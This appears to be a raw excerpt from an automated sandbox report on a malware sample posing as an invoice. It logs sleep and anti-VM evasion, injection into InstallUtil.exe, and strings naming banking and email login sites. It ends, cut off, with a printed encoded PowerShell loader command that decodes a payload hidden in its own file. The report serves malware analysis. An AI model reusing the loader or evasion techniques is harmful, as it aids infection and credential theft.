                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory allocated: 42B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory allocated: 7F80000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1540000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F50000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeWindow / User API: threadDelayed 2695Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeWindow / User API: threadDelayed 3455Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5486Jump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeWindow / User API: threadDelayed 4439
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeWindow / User API: threadDelayed 1330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3965
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5802
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe TID: 7916Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -31000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30850s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -30112s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -37000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36657s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36532s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36407s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36297s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -36176s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35963s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35299s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -35047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34938s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34813s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036Thread sleep time: -34266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe TID: 2120Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -32000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31890s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31781s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31671s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31562s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31450s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31331s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31216s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -31107s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30982s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30859s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30734s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30625s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30515s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30406s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30297s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30187s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -30078s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30850Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30112Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 37000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36407Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 36176Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35963Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35299Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 35047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 34266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 32000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31331
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31216
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 31107
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30982
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30515
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30406
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30297
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30187
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 30078
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: InstallUtil.exe, 00000009.00000002.1450013749.000000000082F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: InstallUtil.exe, 00000011.00000002.1613446812.0000000001281000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
                Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_04F2B440 LdrInitializeThunk,9_2_04F2B440
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000Jump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2F1008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwB